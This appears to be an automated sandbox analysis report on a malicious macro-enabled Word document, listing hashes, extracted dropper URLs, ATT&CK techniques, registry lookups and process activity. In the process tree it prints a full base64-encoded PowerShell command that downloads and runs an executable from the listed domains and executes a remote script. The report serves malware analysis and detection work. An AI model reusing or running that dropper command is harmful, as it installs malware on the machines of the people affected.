ff10e852973c6675fa1f623eb27ff70306ba607a25c976d78d9396731205ec0e

General

Target

1ee0336e030dc9d11b09d43f33cdb9ed_JaffaCakes118.docm
Size

66KB
MD5

1ee0336e030dc9d11b09d43f33cdb9ed
SHA1

cf76616a5b3a58055407d69df9e2ebbba460ed48
SHA256

ff10e852973c6675fa1f623eb27ff70306ba607a25c976d78d9396731205ec0e
SHA512

78bf7942ad153c2e0c02add27d3b5a8af2385831893a20a8f8a20ab584f71ad88bf172cf4e9c76df928f1c31603c2cbf928ff7a5f547996efba1b5c0a43ecfe9
SSDEEP

1536:Az0Cye/Y8HvkktFDyL7PaSHCRM7PaqgZ3j2ksHLfxd:a0Cy6Y8sDXySHFjaTZzG

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://anymonbunrybgakbweew.com/s.php?id=dogc

ps1.dropper

http://cnhoteltex.com/Stat.count

exe.dropper

http://anymonbunrybgakbweew.com/SS/dogc.tzm

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3796	4944	powershell.exe	83

Blocklisted process makes network request 2 IoCs

flow	pid	Process
124	3796	powershell.exe
125	3796	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3796	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3636	WINWORD.EXE
3636	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3796	powershell.exe
3796	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3796	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3636	WINWORD.EXE
3636	WINWORD.EXE
3636	WINWORD.EXE
3636	WINWORD.EXE
3636	WINWORD.EXE
3636	WINWORD.EXE
3636	WINWORD.EXE
3636	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1ee0336e030dc9d11b09d43f33cdb9ed_JaffaCakes118.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoExit -Exec Bypass -EC IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGEAbgB5AG0AbwBuAGIAdQBuAHIAeQBiAGcAYQBrAGIAdwBlAGUAdwAuAGMAbwBtAC8AUwBTAC8AZABvAGcAYwAuAHQAegBtACcALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXABjAGUANgBhAGIAYQBlADAALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwAYwBlADYAYQBiAGEAZQAwAC4AZQB4AGUAJwA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYQBuAHkAbQBvAG4AYgB1AG4AcgB5AGIAZwBhAGsAYgB3AGUAZQB3AC4AYwBvAG0ALwBzAC4AcABoAHAAPwBpAGQAPQBkAG8AZwBjACcAKQA7ACAASQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAG4AaABvAHQAZQBsAHQAZQB4AC4AYwBvAG0ALwBTAHQAYQB0AC4AYwBvAHUAbgB0ACcAKQApADsA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD73A9.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejtdkqzb.mxl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3636-14-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-587-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-4-0x00007FFCA584D000-0x00007FFCA584E000-memory.dmp

Filesize
4KB

Download
memory/3636-5-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-6-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-8-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-7-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-10-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-9-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-13-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-12-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-11-0x00007FFC63240000-0x00007FFC63250000-memory.dmp

Filesize
64KB

Download
memory/3636-0-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-1-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-543-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-509-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-536-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-555-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-3-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-589-0x00007FFCA57B0000-0x00007FFCA59A5000-memory.dmp

Filesize
2.0MB

Download
memory/3636-2-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-15-0x00007FFC63240000-0x00007FFC63250000-memory.dmp

Filesize
64KB

Download
memory/3636-585-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-586-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3636-588-0x00007FFC65830000-0x00007FFC65840000-memory.dmp

Filesize
64KB

Download
memory/3796-570-0x000001D8B8EB0000-0x000001D8B8EF4000-memory.dmp

Filesize
272KB

Download
memory/3796-565-0x000001D8B8D30000-0x000001D8B8D52000-memory.dmp

Filesize
136KB

Download
memory/3796-590-0x000001D8B9360000-0x000001D8B93D6000-memory.dmp

Filesize
472KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads